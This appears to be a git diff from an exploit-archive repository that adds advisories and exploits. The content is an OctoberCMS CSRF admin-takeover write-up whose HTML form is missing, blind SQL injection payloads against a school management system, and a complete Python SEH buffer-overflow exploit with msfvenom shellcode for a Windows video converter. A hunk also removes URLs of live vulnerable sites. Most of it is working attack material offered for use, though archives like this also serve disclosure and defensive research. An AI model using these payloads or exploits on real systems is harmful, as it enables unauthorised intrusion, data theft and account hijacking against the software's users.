CSRF to Admin Account Takover +# Vendor Homepage: https://octobercms.com +# Software Link: https://octobercms.com/download +# Exploit Author: Zain Sabahat +# Website: https://about.me/ZainSabahat +# Category: webapps +# CVE: CVE-2017-16244 + +1. Description + +Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF Tokens for postback handling, allowing an attacker to successfully take over the victim's account. +The vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring.The researcher found a way to bypass this protection.After digging more in the Application he found a postback variable "_handler=" which could be used to perform CSRF without X-Headers.The CSRF Tokens were also not being validated when _handler parameter was used to make the request. +In short, this attack bypasses a protection mechanism involving X-CSRF headers and CSRF tokens via a certain _handler postback variable. + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16244 +https://vuldb.com/?id.108857 + +2. Proof of Concept + Below is the CSRF Exploit (.html) which can lead to the takeover of the Admin's Account upon successful execution. + + + +
+ + + + + + + + + +
+ + + +Upon execution of this CSRF, the Admin Account details will be replaced by ours leading to complete hijacking of Admin Account. + +3. Reference + + https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0 + https://vuldb.com/?id.108857 + +4. Solution + +The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0). + + + diff --git a/platforms/php/webapps/43108.txt b/platforms/php/webapps/43108.txt new file mode 100755 index 000000000..c65ed6778 --- /dev/null +++ b/platforms/php/webapps/43108.txt @@ -0,0 +1,37 @@ +# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection +# Date: 01.11.2017 +# Vendor Homepage: http://iloveprograming.com/ +# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system +# Demo: http://iloveprograming.com/view/login.php +# Version: 2.3.0 +# Category: Webapps +# Tested on: Kali Linux 2.0 +# Exploit Author: Giulio Comi +# Contact: https://linkedin.com/in/giuliocomi +#Description + +This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter. + +# Proof of Concept: + +http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload] + + +# Vulnerable Parameter: friend_index (GET) + + + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg + Vector: AND [INFERENCE] + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO + Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + + + + + diff --git a/platforms/php/webapps/8461.txt b/platforms/php/webapps/8461.txt index 4a0bbcba5..b0b018f30 100755 --- a/platforms/php/webapps/8461.txt +++ b/platforms/php/webapps/8461.txt @@ -24,13 +24,6 @@ # #Use or '=' as username and password # -# -#Live demo : -#-------------------------------- -# -#http://www.brummelliese.de/count/stats/ -#http://www.fire.uni-freiburg.de/counter/welcome/stats/ -# #======================================================================================================================= #Discovered by : -tmh- & Lainux # diff --git a/platforms/windows/local/43104.py b/platforms/windows/local/43104.py new file mode 100755 index 000000000..fb98d14de --- /dev/null +++ b/platforms/windows/local/43104.py @@ -0,0 +1,53 @@ +#!/usr/bin/python + +############################################################################### +# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH) +# Date: 05-10-2017 +# Exploit Author: Venkat Rajgor +# Vendor Homepage: http://www.divxtodvd.net/ +# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe +# Tested On: Windows 7 x64 +# +# +# To reproduce the exploit: +# 1. Click Register +# 2. In the "Enter User Name" field, paste the content of evil.txt +# +############################################################################## +filename="evil.txt" + +buffer = "\x41" * 1008 #Buffer + +nSEH = "\xEB\x06\x90\x90" #short Jump + +SEH = "\x59\x78\x03\x10" #SEH + +badchars = "\x00\x0A\x0D\x1A" # Bad Chars + +# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c # Payload To Pop Calc + +shell=( +"\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" +"\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52" +"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61" +"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e" +"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99" +"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f" +"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98" +"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94" +"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23" +"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1" +"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff" +"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59" +"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3" +"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09" +"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96") + +evil = "\x90"*20 + shell + +buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil + + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file